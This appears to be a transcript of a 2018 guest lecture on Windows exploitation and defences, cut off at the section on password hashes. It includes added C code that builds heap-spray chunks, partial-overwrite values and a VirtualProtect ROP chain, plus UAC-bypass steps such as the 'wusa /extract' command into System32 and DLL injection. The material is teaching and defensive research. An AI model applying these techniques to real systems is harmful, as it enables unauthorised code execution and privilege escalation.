Version: 1.0
Date: 17.01.2018
Author: R. Freingruber
Responsible: R. Freingruber
Confidentiality Class: Public

Guest Lecture - Windows Security
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security | Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018 | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved

Lecturer
• René Freingruber ([email protected])
• Twitter: @ReneFreingruber
• Bachelor student (Technical University Vienna)
• Lecturer at FH St. Pölten & Johannes Kepler University
  • Reverse Engineering & Exploit Development courses
• Security Consultant at SEC Consult
  • Reverse Engineering / exploit development / fuzzing
• Trainer: Secure C/C++, Reversing, Windows Hardening and Red Teaming
• Social Engineering / Client Hardening / Internal Audits / Web Pentesting
• Previously spoke at:
  • CanSecWest, 31C3, DeepSec, NorthSec, RuxCon, ToorCon, ZeroNights, BSides Vienna, QuBit, Hacktivity, IT-SeCX, DSS ITSEC, OWASP Chapter
  • Lightning Talks: Hack.lu, Recon, Hacktivity

SEC Consult
• Founded 2002
• Leading in IT-Security Services and Consulting
• Strong customer base in Europe and Asia
• 70+ Security experts
• 350+ Security audits per year
• Offices: Vienna (HQ) | AT, Wiener Neustadt | AT, Zurich | CH, Berlin | DE, Frankfurt | DE, Vilnius | LT, Moscow | RU, Montreal | CA, Singapore | SG

WE ARE HIRING
Source: http://www.globalresearch.ca/wp-content/uploads/2015/06/unclesam-we-want-you.jpg
• SEC Consult is hiring!
• Lots of interesting projects in an international leading security company
• Experienced team with a passion to hack systems ☺
• Contact: [email protected]
• Just talk to me directly after the talk!

Memory Corruptions

Classic buffer overflow

Stack before BOF (high address, e.g. 0xc0000000, at the top; the stack grows downwards, writes into buf go upwards):
  Old values
  Arg3: 0x00000006
  Arg2: 0x00000005
  Arg1: 0x00000063
  Old EIP (RET)
  Old EBP (SFP)              <- EBP
  buf[4-7]    -4(%EBP)
  buf[0-3]    -8(%EBP)       <- ESP

Stack after BOF (written from buf[0] upwards):
  Padding (e.g. 0x414141...) over buf and the saved EBP
  New RET address = a hardcoded address that points into the NOP sled
  NOP sled (= 0x90909090...)
  Shellcode
  Execution path: after the ret instruction EIP holds the hardcoded address, slides through the NOP sled and ends up in the shellcode

Protections today
• We have to bypass all these mitigation techniques!
• No protection mechanism is 100% bullet proof, all can be bypassed in some special situations
• The most difficult part is to bypass ASLR and DEP together

Countermeasure: ASLR
Stack after BOF, same layout as before (padding e.g. 0x414141..., new RET address, NOP sled = 0x90909090..., shellcode), but the high address of the stack is NOT STATIC any more: the hardcoded address in the new RET no longer points into the NOP sled.

Countermeasure: ASLR
• Address space layout randomization
• Randomizes:
  • Start address of the stack (local variables, function arguments, ..)
  • Start address of the heap (dynamically allocated variables)
  • Start address of the code segments
  • Address of the PEB (process environment block)
  • Address of the TEB (thread environment block)
  • Returned addresses of VirtualAlloc (since Windows 8.1)
  • ....
• Security heavily depends on the number of randomized bits
• 64-bit provides much more security than 32-bit!
Countermeasure: ASLR
• There are many ways to bypass ASLR!
  • Use an information leak vulnerability
  • For local 32-bit applications it's possible to brute-force
  • Use non-randomized segments (heap, VirtualAlloc() returned memory, ...); mostly fixed these days
  • Partial overwrites (ASLR randomizes the upper bits, so just overwrite the lower bits to jump to other code)
  • Use a module which does not support ASLR (that's why you should not have Java 6 installed!)
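A worked illustration of the partial-overwrite bullet, added to this transcript and not part of the original slides. On 32-bit Windows, image ASLR relocates a module in 64 KiB steps, so the low 16 bits of every address inside the module are identical in every process and only the upper bits are randomized. Overwriting just the two low bytes of a saved return address therefore redirects execution to another location in the same 64 KiB block without knowing the base. The module offsets and base addresses below are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Image ASLR on Windows relocates a module in 64 KiB steps, so the low 16 bits
   of every address inside the module are the same in every process; only the
   bits above that are randomized. */
#define ASLR_IMAGE_GRANULARITY 0x10000u
#define STABLE_MASK (ASLR_IMAGE_GRANULARITY - 1u)   /* 0x0000FFFF */

/* Plan a 2-byte (low-word) overwrite of a saved return address.
   ret_rva    : module-relative offset of the original return target
   target_rva : module-relative offset of the code we want to reach instead
   out[2]     : the two little-endian bytes the overflow must write
   Fails when the target is in a different 64 KiB block, because then the
   randomized upper half of the address would have to change as well. */
bool plan_low_word_overwrite(uint32_t ret_rva, uint32_t target_rva, uint8_t out[2]) {
    if ((ret_rva & ~STABLE_MASK) != (target_rva & ~STABLE_MASK))
        return false;
    out[0] = (uint8_t)(target_rva & 0xFFu);         /* least significant byte first */
    out[1] = (uint8_t)((target_rva >> 8) & 0xFFu);
    return true;
}

/* What ends up in EIP: the randomized upper half of the saved return address
   survives untouched, only the low word has been replaced by the overflow. */
uint32_t apply_low_word_overwrite(uint32_t saved_ret, const uint8_t low[2]) {
    return (saved_ret & ~STABLE_MASK) | (uint32_t)low[0] | ((uint32_t)low[1] << 8);
}

/* Plan and apply in one step. Returns 0 if the target is not reachable. */
uint32_t hijack_return(uint32_t saved_ret, uint32_t ret_rva, uint32_t target_rva) {
    uint8_t low[2];
    if (!plan_low_word_overwrite(ret_rva, target_rva, low))
        return 0;
    return apply_low_word_overwrite(saved_ret, low);
}

/* Demonstration: the same two bytes redirect the return for any module base. */
int main(void) {
    const uint32_t ret_rva    = 0x00011234u;  /* constructed: original return target */
    const uint32_t target_rva = 0x00011A00u;  /* constructed: gadget in the same 64 KiB */
    const uint32_t bases[] = { 0x6B000000u, 0x77A60000u, 0x10000000u };  /* constructed */

    for (size_t i = 0; i < sizeof bases / sizeof bases[0]; i++) {
        uint32_t saved    = bases[i] + ret_rva;
        uint32_t hijacked = hijack_return(saved, ret_rva, target_rva);
        printf("base %08x: saved ret %08x -> %08x (%s)\n", bases[i], saved, hijacked,
               hijacked == bases[i] + target_rva ? "hits the gadget" : "miss");
    }
    /* A gadget in another 64 KiB block is out of reach for a 2-byte overwrite. */
    printf("target 0x00021A00 reachable: %s\n",
           hijack_return(bases[0] + ret_rva, ret_rva, 0x00021A00u) ? "yes" : "no");
    return 0;
}
```

One practical caveat: a string-copy overflow appends a terminating NUL, which would clobber the third byte of the return address as well, so partial overwrites need an overflow whose length the attacker controls exactly (e.g. a memcpy with an attacker-chosen size).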

Example .ANI exploit
• Two vulnerabilities:
  • MS05-002
  • MS07-017
• Can be triggered via Firefox, Internet Explorer, ….
• E.g. code for Internet Explorer:
  <html>
  <body style="CURSOR: url('127.0.0.1/exploit.ani')"></body>
  </html>

Example .ANI exploit
• The „anih“ chunk size is normally 0x24 (36 bytes); the exploit file sets it to 120 (0x78), so copying the oversized header into the fixed-size structure overflows the stack
• Overwrites the return address with 0x0d0d0d0d
• Uses a heap spray to store the shellcode at 0x0d0d0d0d

Attack technique: Heap Spray
• Idea: allocate many, many large strings (each one a sled followed by the shellcode) until the heap has grown so far that every likely address holds a copy of the string ...
• Then 0x0d0d0d0d must also hold the string and ASLR is bypassed

Attack technique: Heap Spray
• Memory map before the heap spray vs. after the heap spray: after spraying, the heap is filled with copies of one chunk (sled + shellcode), separated by gaps
• Return address was overwritten with 0x0d0d0d0d
• 0x0d0d0d0d must point to a location marked as „good“ to make the exploit work!
• If 0x0d0d0d0d points to „bad“ the application will crash

  0x0d0d0d0d …… 0x0d0d0d0d | Shellcode | gap | 0x0d0d0d0d …… 0x0d0d0d0d | Shellcode | gap | 0x0d0d0d0d …… 0x0d0d0d0d | Shellcode | gap | 0x0d0d0d0d …… 0x0d0d0d0d | Shellcode | gap
  Good                        Bad               Good                        Bad               Good                        Bad               Good                        Bad
  (Good = landing in the 0x0d sled; Bad = landing in the shellcode body or in the gap between two chunks)

• Dump of memory after the heap spray (return address overwritten with 0x0d0d0d0d):

Attack technique: Heap Spray
• Execution starts in the sled, executing „OR EAX, 0x0d0d0d0d“ (the byte 0x0d is the opcode of OR EAX, imm32 and the following 0x0d bytes are its operand) over and over until the start of the shellcode is reached; the dump shows the NOP sled, a break for debugging and the start of the shellcode
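An added example (mine, not from the slides) of why the sled in a heap spray is made of 0x0d bytes and what can go wrong at its end. The byte 0x0d is the x86 opcode of OR EAX, imm32, so a run of 0x0d bytes decodes as OR EAX, 0x0d0d0d0d wherever EIP lands in it, and 0x0d0d0d0d can serve as both the sprayed address and the sled content. Because each of those instructions is five bytes long, the last one may run past the end of the sled and swallow the first bytes of the shellcode as its operand; the code measures that loss for a given landing offset and shows that a few real NOPs (0x90) in front of the shellcode absorb it. The shellcode bytes are a constructed stand-in.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the shellcode: xor eax,eax ; push eax ; push 'calc'. */
static const uint8_t kPayload[] = { 0x31, 0xC0, 0x50, 0x68, 0x63, 0x61, 0x6C, 0x63 };

/* One sprayed chunk: a long run of a single byte followed by the shellcode. */
size_t build_spray_chunk(uint8_t sled_byte, size_t sled_len,
                         const uint8_t *shellcode, size_t sc_len,
                         uint8_t *out, size_t out_cap) {
    if (sled_len + sc_len > out_cap)
        return 0;
    memset(out, sled_byte, sled_len);
    memcpy(out + sled_len, shellcode, sc_len);
    return sled_len + sc_len;
}

/* x86 instruction length for the bytes a sled is usually made of:
     0x90 = NOP            (1 byte)
     0x0C = OR AL, imm8    (2 bytes)
     0x0D = OR EAX, imm32  (5 bytes)
   Returns 0 for anything else, meaning "this byte is not part of the sled". */
static size_t sled_insn_len(uint8_t opcode) {
    switch (opcode) {
    case 0x90: return 1;
    case 0x0C: return 2;
    case 0x0D: return 5;
    default:   return 0;
    }
}

/* Simulate EIP arriving at chunk[entry] and stepping through sled
   instructions until a byte is reached that is not a sled opcode.
   Returns the offset at which the CPU really starts decoding the payload.
   With a 0x0D sled every instruction is five bytes long, so depending on
   where EIP landed the last OR EAX, imm32 can reach past the end of the
   sled and swallow up to four payload bytes as its immediate operand. */
size_t first_payload_insn(const uint8_t *chunk, size_t len, size_t entry) {
    size_t ip = entry;
    while (ip < len) {
        size_t n = sled_insn_len(chunk[ip]);
        if (n == 0)
            break;
        ip += n;
    }
    return ip;
}

/* Number of real payload bytes lost when landing at `entry` in a chunk whose
   payload is preceded by `nop_prefix` NOP bytes (0x90). 0 means the payload
   executes from its first instruction. Returns (size_t)-1 on bad sizes. */
size_t payload_bytes_lost(uint8_t sled_byte, size_t sled_len, size_t nop_prefix, size_t entry) {
    uint8_t chunk[4096];
    uint8_t payload[64];
    if (nop_prefix + sizeof kPayload > sizeof payload ||
        sled_len + sizeof payload > sizeof chunk || entry >= sled_len)
        return (size_t)-1;
    memset(payload, 0x90, nop_prefix);
    memcpy(payload + nop_prefix, kPayload, sizeof kPayload);
    size_t len = build_spray_chunk(sled_byte, sled_len, payload,
                                   nop_prefix + sizeof kPayload, chunk, sizeof chunk);
    size_t start = first_payload_insn(chunk, len, entry);
    size_t real_start = sled_len + nop_prefix;   /* where the payload proper begins */
    return start > real_start ? start - real_start : 0;
}

int main(void) {
    for (size_t entry = 0; entry < 5; entry++)
        printf("landing at sled+%zu: plain 0x0D sled loses %zu payload byte(s), with 4 NOPs in front: %zu\n",
               entry, payload_bytes_lost(0x0D, 100, 0, entry), payload_bytes_lost(0x0D, 100, 4, entry));
    return 0;
}
```

The loss only depends on (sled length - landing offset) modulo the sled instruction length, which is why a 0x90 sled never loses anything, a 0x0c sled loses at most one byte and a 0x0d sled up to four; four leading NOPs in the payload make the 0x0d variant safe for every landing offset.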

EMET
• EMET = Microsoft Enhanced Mitigation Experience Toolkit
• Heap-spray target addresses get reused over and over
  • Only a handful of addresses are commonly used, such as 0x0d0d0d0d
  • Many exploit developers just copy & paste heap-spray code (including the target address)
• EMET's HeapSpray protection
  • Simply preallocates all these target addresses
  • Exploit code can't spray shellcode to these locations
  • Addresses: 0x0a040a04, 0x0a0a0a0a, 0x0b0b0b0b, 0x0c0c0c0c, 0x0d0d0d0d, 0x0e0e0e0e, 0x04040404, 0x05050505, 0x06060606, 0x07070707, 0x08080808, 0x09090909, 0x20202020, 0x14141414

Countermeasure: DEP
Stack after BOF, same layout as before (high address e.g. 0xc0000000, padding e.g. 0x414141..., new RET address, NOP sled = 0x90909090..., shellcode), but the stack is NOT EXECUTABLE: the hardcoded address in the new RET still hits the NOP sled, yet fetching the first instruction from it raises an access violation instead of running the shellcode.

Countermeasure: DEP
• Data Execution Prevention
• Idea: data on the stack must not be executable (because it contains data and not code), thus mark it as not executable
• The attacker can't execute his own code, because that code is stored as data and thus not executable
• Bypass techniques:
  • Return2libc
  • ROP (Return Oriented Programming)

Bypass DEP
• ROP = Return Oriented Programming
• Idea: reuse / abuse already existing code
• New code can be built by chaining small pieces of already existing code (gadgets) together
• Two approaches:
  • Write a ROP chain that disables DEP (and then run normal shellcode)
  • Write the complete shellcode in ROP

Attack technique: Return Oriented Programming
• Let's look again at the stack after the function returned to the manipulated return address:
  Padding (e.g. 0x0d0d0d...)
  New RET address 0x0d0d0d0d    (already popped by the ret instruction)
  NOP sled (= 0x0d0d0d0d...)    <- ESP
  Shellcode

Attack technique: Return Oriented Programming
• Jump to already existing code to bypass ASLR: a „JMP ESP“ instruction in a loaded module brings execution to the data that follows the return address on the stack
• The bytes do not have to be a real instruction: jump into the middle of a longer instruction whose bytes happen to encode „JMP ESP“ (FF E4)
• Important: the corresponding module must be compiled with ASLR off, because otherwise „JMP ESP“ would be at another address on every run

Attack technique: Return Oriented Programming
• The new attack: the stack after the overflow is
  Padding (e.g. 0x414141...)
  New RET address 0x7cb3c1f6    (address of „JMP ESP“ in a non-ASLR module)
  Shellcode                     <- ESP after the ret instruction
• Another method to bypass ASLR!
• But: with DEP enabled it's still not possible to execute the shellcode....

Attack technique: Return Oriented Programming
• ROP extends this technique to build the complete shellcode with existing code (so called gadgets!)
  Padding (e.g. 0x414141...)
  RET: Gadget 1                 <- ESP at the first ret
  0x41414141                    -> EAX
  Gadget 2
  0x42424242                    -> ESI
  0x43434343                    -> EBP
  Gadget 3
• Every gadget ends with a RET, so each RET pops the next gadget address and ESP walks up the chain; the values between the gadget addresses are popped into registers by the gadgets

Attack technique: ROP
• Typically the ROP chain calls an API function that disables DEP or makes the shellcode memory executable
• Then the real shellcode can be executed
• Examples of functions which can be called:
  • VirtualAlloc
  • VirtualProtect
  • SetProcessDEPPolicy
  • NtSetInformationProcess
  • HeapCreate
  • LoadLibrary (e.g. a library from the attacker via a UNC path)

VirtualProtect() to disable DEP
Source: http://opensecuritytraining.info/

EMET
• End of life: July 31, 2018
• Every time a „critical function“ (e.g. VirtualProtectEx) gets called, EMET applies extra checks (but EMET contains many other protections as well)
• Examples:
  • Caller / SimExecFlow: check that the function was called and not returned into (e.g. check for a CALL instruction in front of the return address; SimExecFlow additionally simulates the execution flow after the return)
  • MemProt: prevent functions (e.g. VirtualProtectEx) from making the stack executable
  • StackPivot: check whether the stack pointer (ESP) still points to the thread's stack (or whether it was pivoted away)
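Added example (not from the original slides or from EMET) that puts the two sides of the VirtualProtect technique next to each other: the stack layout a ROP chain has to fabricate so that returning into VirtualProtect() marks the shellcode page executable and then "returns" into it, and the heuristic behind EMET's Caller check, which inspects the bytes in front of the return address for a CALL instruction. The API and shellcode addresses are made up; the CALL encodings checked are a subset of what a real implementation would cover.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed addresses for the illustration. In a real exploit they come
   from a non-ASLR module or from an information leak. */
#define ASSUMED_VIRTUALPROTECT 0x7C801AD4u   /* kernel32!VirtualProtect (made up) */
#define ASSUMED_SHELLCODE      0x0D0D0D0Du   /* sprayed shellcode */
#define ASSUMED_WRITABLE_DWORD 0x0D0D0D00u   /* scratch slot for lpflOldProtect */
#define PAGE_EXECUTE_READWRITE 0x40u

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Attack side. The overwritten return address is VirtualProtect itself; once
   RET has popped it, the stack looks like an ordinary stdcall frame:
     [ESP]    return address  -> the shellcode, reached when VirtualProtect returns
     [ESP+4]  lpAddress       -> page containing the shellcode
     [ESP+8]  dwSize
     [ESP+12] flNewProtect    -> PAGE_EXECUTE_READWRITE
     [ESP+16] lpflOldProtect  -> any writable dword
   Writes 24 bytes and returns that length, or 0 if `cap` is too small. */
size_t build_virtualprotect_chain(uint32_t vp_addr, uint32_t shellcode, uint32_t size,
                                  uint32_t writable_dword, uint8_t *out, size_t cap) {
    if (cap < 24)
        return 0;
    put_le32(out + 0,  vp_addr);
    put_le32(out + 4,  shellcode);
    put_le32(out + 8,  shellcode & ~0xFFFu);   /* page-align lpAddress */
    put_le32(out + 12, size);
    put_le32(out + 16, PAGE_EXECUTE_READWRITE);
    put_le32(out + 20, writable_dword);
    return 24;
}

/* Builds the chain with the assumed addresses and returns its dword `idx`. */
uint32_t demo_chain_dword(size_t idx) {
    uint8_t chain[24];
    if (idx >= 6)
        return 0;
    build_virtualprotect_chain(ASSUMED_VIRTUALPROTECT, ASSUMED_SHELLCODE, 0x1000u,
                               ASSUMED_WRITABLE_DWORD, chain, sizeof chain);
    return get_le32(chain + 4 * idx);
}

/* Defensive side, the idea behind EMET's "Caller" check: when VirtualProtect
   is entered through a real CALL, the bytes in front of the return address
   decode to a CALL instruction. A return address planted by a ROP chain
   (here: the middle of a 0x0D sled) has no such instruction before it.
   `code` holds the n bytes immediately preceding the return address.
   Encodings checked (a subset of what a real implementation would cover):
     E8 rel32        call rel32      (5 bytes)
     FF 15 disp32    call [disp32]   (6 bytes)
     FF D0..D7       call reg        (2 bytes)
     FF 10..17       call [reg]      (2 bytes; 14/15 need SIB/disp32, excluded) */
bool return_address_preceded_by_call(const uint8_t *code, size_t n) {
    if (n >= 5 && code[n - 5] == 0xE8)
        return true;
    if (n >= 6 && code[n - 6] == 0xFF && code[n - 5] == 0x15)
        return true;
    if (n >= 2 && code[n - 2] == 0xFF) {
        uint8_t modrm = code[n - 1];
        if (modrm >= 0xD0 && modrm <= 0xD7)
            return true;
        if (modrm >= 0x10 && modrm <= 0x17 && modrm != 0x14 && modrm != 0x15)
            return true;
    }
    return false;
}

/* Constructed byte sequences found in front of a return address. */
static const uint8_t kSprayedBytesBeforeRet[] = { 0x0D, 0x0D, 0x0D, 0x0D, 0x0D, 0x0D, 0x0D, 0x0D };
static const uint8_t kDirectCallSite[]       = { 0x90, 0xE8, 0x10, 0x00, 0x00, 0x00 };  /* nop; call +0x10 */
static const uint8_t kImportCallSite[]       = { 0xFF, 0x15, 0x00, 0x10, 0x40, 0x00 };  /* call [0x401000] */
static const uint8_t kRegisterCallSite[]     = { 0x90, 0xFF, 0xD0 };                    /* nop; call eax */

int main(void) {
    printf("VirtualProtect returns to %08x, lpAddress %08x, flNewProtect %08x\n",
           demo_chain_dword(1), demo_chain_dword(2), demo_chain_dword(4));
    printf("Caller check, sprayed return address: %s\n",
           return_address_preceded_by_call(kSprayedBytesBeforeRet, sizeof kSprayedBytesBeforeRet)
               ? "passes" : "no CALL in front of it -> blocked");
    printf("Caller check, real call sites: %d %d %d\n",
           return_address_preceded_by_call(kDirectCallSite, sizeof kDirectCallSite),
           return_address_preceded_by_call(kImportCallSite, sizeof kImportCallSite),
           return_address_preceded_by_call(kRegisterCallSite, sizeof kRegisterCallSite));
    return 0;
}
```

The chain works because VirtualProtect's own RET consumes the fabricated return slot, so control lands in the now executable page without any further gadget; the Caller heuristic catches exactly that property, a "return" into a sensitive API from a location that no CALL ever left.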

Windows 10 Exploit Protection
• Windows 10 implements the functionality of EMET by default!

Mitigations on a modern Windows system (incomplete list!)
• ASLR – Address Space Layout Randomization (kASLR in the kernel)
• DEP – Data Execution Prevention
• Stack Cookies, Variable Reordering (/GS)
• Heap Protections
  • safe unlinking, heap cookies, header encoding, isolated heap, delayed free, MemGC, MemProt, ....
• Virtual Table Guard (VTGuard)
• Control Flow Guard (CFG) / Return Flow Guard (RFG)
• Exception Handling
  • SafeSEH, SEHOP, software DEP, XOR register values
• Sandboxes (Mandatory Integrity Level)
• EMET / Windows 10 Exploit Protection
  • EAF, EAF+, Caller, SimExecFlow, LoadLib, MemProt, HeapSpray, NullPage, ...
• ACG (Arbitrary Code Guard) / CIG (Code Integrity Guard)
• SMEP / SMAP (the kernel must not execute / access user-space memory)
• PatchGuard / Kernel-Mode Code Signing

Microsoft vulnerability classes distribution
Source: Exploitation Trends: From Potential Risk to Actual Risk

Microsoft vulnerability classes distribution
Source: Windows 10 Mitigation Improvements, Microsoft

Microsoft vulnerability classes distribution
Source: Windows 10 Mitigation Improvements, Microsoft
More vulnerabilities are found, but fewer exploits are developed (mitigation techniques make exploit development really hard!)

User Account Control (UAC)

UAC – User Account Control
• Introduced with Microsoft Windows Vista
• What does UAC do?
  • Creates two access tokens for the user
    • Standard user access token
    • Full Administrator access token
  • Credential Prompt
  • Consent Prompt

UAC – User Account Control
• Several possibilities exist to bypass UAC
• Public ones only work if UAC is used in default settings

UAC – User Account Control
• Example: start cmd as a normal user and run: whoami /all

UAC – User Account Control
• Now the same, but we start cmd.exe via right click, „Run as administrator“:

Sandboxes
• This is also how sandboxes work:
  • The „untrusted“ chrome process cannot access e.g. the file system
• Even if we find a vulnerability in the DOM parser / JS implementation / …, we are still inside an untrusted process!
• A sandbox escape (another vulnerability) is required to get out!

Abusing privileges
• Some privileges can directly be used to escalate to SYSTEM access!
  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege
• Check the following link for an in-depth explanation:
  • https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
• Privileges are also a target for kernel exploits: instead of getting kernel code execution, flipping a single bit in the token of your own process is enough to grant it a privilege!
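Added example, not from the slides: the check a tester runs on a foothold to see whether the current token already holds one of the privileges listed above. It parses the table printed by `whoami /priv` (a constructed sample is embedded so it runs offline) and flags the dangerous names. Privileges shown as Disabled are flagged too: a privilege that is present in the token can be enabled by the process itself with AdjustTokenPrivileges, so presence is what matters. Written in C to match the rest of the page.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Privileges from the slide that give a direct path to SYSTEM. */
static const char *const kDangerousPrivileges[] = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
};

bool is_dangerous_privilege(const char *name) {
    for (size_t i = 0; i < sizeof kDangerousPrivileges / sizeof kDangerousPrivileges[0]; i++)
        if (strcmp(name, kDangerousPrivileges[i]) == 0)
            return true;
    return false;
}

/* Parse the table printed by `whoami /priv`. Each data row starts with the
   privilege name (always "Se..."), followed by description and state. A
   privilege listed as Disabled is reported as well: it is present in the
   token, and the process can enable it itself with AdjustTokenPrivileges.
   Copies up to `cap` matching names into `found`, returns how many matched. */
size_t find_dangerous_privileges(const char *whoami_output, char found[][64], size_t cap) {
    size_t n = 0;
    const char *line = whoami_output;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len > 2 && line[0] == 'S' && line[1] == 'e') {
            char name[64];
            size_t k = 0;
            while (k < len && k < sizeof name - 1 && line[k] != ' ' && line[k] != '\t') {
                name[k] = line[k];
                k++;
            }
            name[k] = '\0';
            if (n < cap && is_dangerous_privilege(name))
                strcpy(found[n++], name);
        }
        if (!eol)
            break;
        line = eol + 1;
    }
    return n;
}

/* Constructed sample output, shaped like `whoami /priv` on a low-privileged
   service account that nevertheless holds two dangerous privileges. */
static const char kSampleWhoamiPriv[] =
    "\n"
    "PRIVILEGES INFORMATION\n"
    "----------------------\n"
    "\n"
    "Privilege Name                Description                               State\n"
    "============================= ========================================= ========\n"
    "SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled\n"
    "SeImpersonatePrivilege        Impersonate a client after authentication Enabled\n"
    "SeCreateGlobalPrivilege       Create global objects                     Enabled\n"
    "SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled\n"
    "SeDebugPrivilege              Debug programs                            Disabled\n";

static char g_hits[16][64];

/* Run the scan over the embedded sample; returns the number of hits. */
size_t demo_scan(void) {
    return find_dangerous_privileges(kSampleWhoamiPriv, g_hits, 16);
}

/* Name of the i-th hit from the last demo_scan(). */
const char *demo_hit(size_t i) {
    return g_hits[i];
}

int main(void) {
    size_t n = demo_scan();
    printf("%zu privilege(s) in the token that lead to SYSTEM:\n", n);
    for (size_t i = 0; i < n; i++)
        printf("  %s\n", demo_hit(i));
    return 0;
}
```

On a real target, pipe the output of `whoami /priv` into the parser instead of the embedded sample; the list of names is the one from the slide and can be extended with whatever the foxglovesecurity write-up adds.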

Abusing privileges
• Many Microsoft services do not run as local SYSTEM; instead they run as „local service“
• Idea: if the service is compromised because of a vulnerability, the attacker does not instantly own SYSTEM privileges
• Problem: most services have privileges which can easily be abused…

Abusing privileges
• Example: the WPAD service has SeImpersonatePrivilege
  • Can be exploited with „token stealing“ and then impersonating that token with SeImpersonatePrivilege
  • Exploit code: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383#c5
• Other example: Steam had SeDebugPrivilege…
Source: https://googleprojectzero.blogspot.co.at/2017/12/apacolypse-now-exploiting-windows-10-in_18.html

Back to UAC…
• Situation: large number of UAC prompts
• Microsoft's solution: special privileges
  • Elevated processes without UAC prompt
  • http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries/
  • Processes can create certain elevated COM objects without a UAC prompt
    • The process can tell the object to perform „admin“ actions
    • Granted to almost every Microsoft executable (e.g. notepad.exe, calc.exe)
• Elevated COM objects, which can be created without a UAC prompt

UAC – User Account Control
Create folders in system32 by using the OpenFile dialog

UAC – User Account Control
Root cause:
• Automatic silent elevation
• Signed by Microsoft
• Located in „secure“ directories (e.g. Windows\System32)

Different types of UAC bypasses
• There are a lot of „GUI“ bypasses which are really simple (as an attacker you typically don't have a GUI, but they show the general problem here…)
• Try it at home yourself!
• *.msc bypasses, e.g. start „gpedit.msc“ (no UAC prompt)

Different types of UAC bypasses
• Search for „*.*“ to get rid of the .txt filter (to see .exe files)
• Right click on „cmd.exe“
• Start as administrator
• No UAC prompt

Different types of UAC bypasses
• Task Manager
  • Start the task manager (no UAC prompt)
  • File → Start process

UAC – User Account Control: code injection into a Windows-signed binary
Bypassuac.exe (normal user privileges) → Notepad.exe (has the privilege to create files in UAC-protected folders without prompting for the UAC dialog, via COM objects; only Windows-signed binaries can use these COM objects)
1) OpenProcess() to attach to notepad.exe
2) VirtualAllocEx() to allocate memory in it
3) WriteProcessMemory() to write the DLL
4) CreateRemoteThread() to execute the DLL
5) The injected DLL starts running inside notepad.exe

UAC – User Account Control: code injection into a Windows-signed binary (continued)
6) The DLL injected into notepad.exe uses notepad.exe's privileges to write a second malicious DLL into the „secure“ directory of Sysprep.exe (autoelevate = true)
Then: Sysprep.exe, which typically loads that DLL from another secure directory (e.g. System32), now loads the malicious DLL placed next to it, and the attacker's code runs elevated without a UAC prompt

Different types of UAC bypasses
1. Inject code into an autoelevated process
  • DLL preloading attacks
  • The variants differ in how the DLL gets placed in the secure directory
    • Leo Davidson's „sysprep“ method: inject code into explorer.exe; the code uses COM objects to store the DLL
  • Target examples:
    • Sysprep.exe with cryptbase.dll, shcore.dll, dbgcore.dll, ...
    • Setupsqm.exe with wdscore.dll

WUSA method
• The WUSA (Windows Update Standalone Installer) method was used by Carberp, a leaked banking trojan
• wusa uses auto-elevated COM objects to write files, so it could write into System32 without a UAC prompt:
  makecab malicious.dll malicious.tmp
  wusa malicious.tmp /extract:C:\Windows\System32\
• Finally fixed in Windows 10…

Different types of UAC bypasses
2. Silently redirect execution of an autoelevated process
  • Application Compatibility Shim „RedirectEXE“ method
  • Shims are used to make old applications compatible with new operating systems (Application → Shim → Windows)
  • Examples of shim rules:
    • RedirectEXE
    • EmulateHeap
    • DisableNX
    • „In Memory Fix“
  • EMET also uses shims to implement protections
  • Generate a shim database (.sdb file) with a RedirectEXE rule (x86 only) and install it with sdbinst.exe redirect.sdb
  • Execution of the autoelevated process is redirected to the attacker's own executable; the signature check is performed on the original binary, not on the redirect target…..
Different types of UAC bypasses
3. Disable UAC via undocumented functions
• The Simda malware used the ISecurityEditor COM object
• Undocumented function to make registry keys writable
• Examples:
• Change the UAC settings in the registry
• An attacker can add a VerifierDLL for an auto-elevated application to inject code
Different types of UAC bypasses
4. Trick the user into confirming the UAC prompt
• E.g. spawn UAC prompts until the user accepts one
• Clickjacking (not possible with the secure desktop)
• Technically not really interesting for us...
5. Many other techniques, check:
• https://github.com/hfiref0x/UACME
• Currently implements 44 different UAC bypasses…
• "UAC is dead for 2996 days", message from 3.10.2017
• Good way to learn more about unknown Windows features…
UAC – Code-Injection Issue
What can we do against it? UAC policy settings
(but those could also be bypassed… UAC is just broken)
Password attacks
Password attacks
• Windows does not store your cleartext password on disk
• It stores hashes instead
• However, the cleartext password is in memory!
• Different types of hashes
• NT hashes (new hash for local accounts)
• LM hashes (old hash for local accounts)
• Domain Cached Credentials (DCC) (domain accounts cached on a workstation so that login works when the PC is not connected to the domain)
• LSA secrets (e.g. service account passwords)
• Credential Manager store (applications can store passwords here)
• Kerberos shared secrets (on the DC)
Password attacks
• LAN Manager (LM) hash
